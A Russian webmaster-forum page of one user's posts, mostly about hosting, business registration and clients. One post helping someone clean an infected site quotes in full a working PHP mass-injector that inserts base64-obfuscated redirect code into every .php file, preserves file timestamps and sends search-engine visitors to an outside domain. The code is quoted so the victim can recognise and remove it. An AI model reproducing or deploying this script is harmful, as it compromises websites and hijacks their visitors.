zigli

Рейтинг
72
Регистрация
24.03.2011
7971c8

Про ИП точно незнаю, но одного ООО добавляли сразу три сайта (все сайты - разный вид деятельности), никаких проблем не возникло.

Качаете программку @Text Replacer http://www.izone.ru/text/utilities/text-replacer.htm

Качаете сайт на ПК и с ее помощью заменяете вредоносный кусок кода на пробел(скачаете программку, там все интуитивно понятно), вот и все. За пару минут программка вычистит весь вредоносный код, затем просто зальете чистый сайт на сервер.

П.С.главное при помощи этой же программки найдите скрипт, который заливает эту гадость в файлы .php, иначе простой чисткой не ограничиться

У меня была такая же ситуация, код добавляется в каждый .php файл сайта.

вредоносный код в виде "base64" в каждом файле .php

---------- Добавлено 22.11.2012 в 00:25 ----------

И обычно просто так от этого не избавиться, так как на сайт заливается скрипт, который всегда снова и снова добавляет в .php файлы вредоносный код.

---------- Добавлено 22.11.2012 в 00:27 ----------

Ищите что-то на подобие этого на сайте, именно этот скрипт редактирует .php файлы.

<?php
set_time_limit(0);
ignore_user_abort(1);
if(!isset($_SERVER['DOCUMENT_ROOT']))
{ if(isset($_SERVER['SCRIPT_FILENAME'])){
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0-strlen($_SERVER['PHP_SELF'])));
}; };
if(!isset($_SERVER['DOCUMENT_ROOT']))
{ if(isset($_SERVER['PATH_TRANSLATED'])){
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0-strlen($_SERVER['PHP_SELF'])));
}; };
function dir_path($dir) {
$code='
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER[\'HTTP_REFERER\'];
$ua=$_SERVER[\'HTTP_USER_AGENT\'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://besttru.qpoe.com/");
exit();
}
}
}';
$dh = opendir($dir);
$path_curent = '';
while (($file = readdir($dh)) !== false)
if ($file != "." and $file != "..")
{
$path = $dir."/".$file;
makechange($path,$code);
if (is_dir($path) && !stristr($path,"cgi-bin"))
{
$path_curent .= "$path";

$path_curent .= dir_path($path);

}
}
closedir($dh);
return $path_curent;
}

function makechange ($path,$code){
if (is_writable($path)) {
if (is_file($path)) {
if (stristr($path,".php") and !stristr($path,"banner") and !stristr($path,"movie") and !stristr($path,"post") and !stristr($path,"img")){
$fo=file_get_contents ($path);
if (!stristr($fo,"base64")) {
$aa=filectime ($path);
$fi=preg_replace("/<\?php/","<?php eval(base64_decode(\"".base64_encode($code)."\"));",$fo);
$fro=fopen($path,"w");
fwrite ($fro,$fi);
fclose ($fro);
@touch ($path,$aa);
$buo=fopen("l","a+");
fwrite ($buo,$path."\n");
fclose($buo);
//echo $path."\n";
}else {
$aa=filectime ($path);
$fi=preg_replace("/eval\(base64_decode\(\"(.*?)\"/","eval(base64_decode(\"".base64_encode($code)."\"",$fo);
$fro=fopen($path,"w");
fwrite ($fro,$fi);
fclose ($fro);
@touch ($path,$aa);
$buo=fopen("c","a+");
fwrite ($buo,$path."\n");
fclose($buo);
//echo $path."\n";
}
}
}
}
}
$docdir=$_SERVER[DOCUMENT_ROOT];
echo $docdir;
$pap=preg_split("/\//",$docdir);
//foreach ($pap as $papp){
for ($i=0;$i<count($pap)-2;$i++){
$updocdir.=$pap[$i]."/";
}
$docdir=$updocdir;
dir_path($docdir);
?>



---------- Добавлено 22.11.2012 в 00:33 ----------

п.с. если это вовремя не устранить, сайт выпадает из выдачи яндекса (проверено очень много раз на собственных сайтах).

п.с.2. если что, пишите утром в лс, помогу разобраться....

В официальном твиттере

Были проблемы с одним из mysql-серверов. В данный момент они решены и сайты вскоре начнут работать нормально.

Надеюсь, скоро починят

---------- Добавлено 20.11.2012 в 18:37 ----------

АП: заработало))).....правда только через раз

"Что будет если я не уплачу этот штраф?"

Все равно заставят заплатить. У Вас есть банковский счет...с него если добровольно не уплатите рано или поздно и сдерут. У меня так ПФР и сделал через какое-то время.

У Вас тестовый период на хостинге сейчас составляет 7 дней, а на рекламных баннерах ( https://support.ihc.ru/img/banners/ ) везде указан 10-дневный тестовый период. Было бы неплохо, если бы баннеры поправили.

Пользуюсь 2-3 месяца, "подводных камней" не обнаружил. Единственное, что мне не очень нравится, так это то, что из способов оплаты только оплата картой или банковским переводом.

Использую tekmi.ru (не так давно конечно начал пользоваться, но все пока отлично). Имеется возможность записи разговоров.

Serjo_201, сначала старались дорабатывать, потом это начало надоедать и банально не хватало времени. После того, как появился нормальный договор, где расписано что, чего и сколько раз мы делаем, эти "задалбывания" прекратились. Сейчас мы сначала все в подробностях объясняем клиенту, он подписывает договор и все, количество "больных клиентов" существенно снизилось.

П.С. Еще реальность такова, что больше всего надо тем, кто заказывает сайты буквально за 5-7 тысяч рублей

1) Должен ли я возвращать деньги в плане справедливости?

- нет (исключительно мое мнение)

2) Должен ли я бы был возвращать деньги по суду? Каковы были бы перспективы этого дела в суде?

- суд бы вас обоих "послал" искать третьего(мошенника или как оказалось "не мошенника")

Всего: 93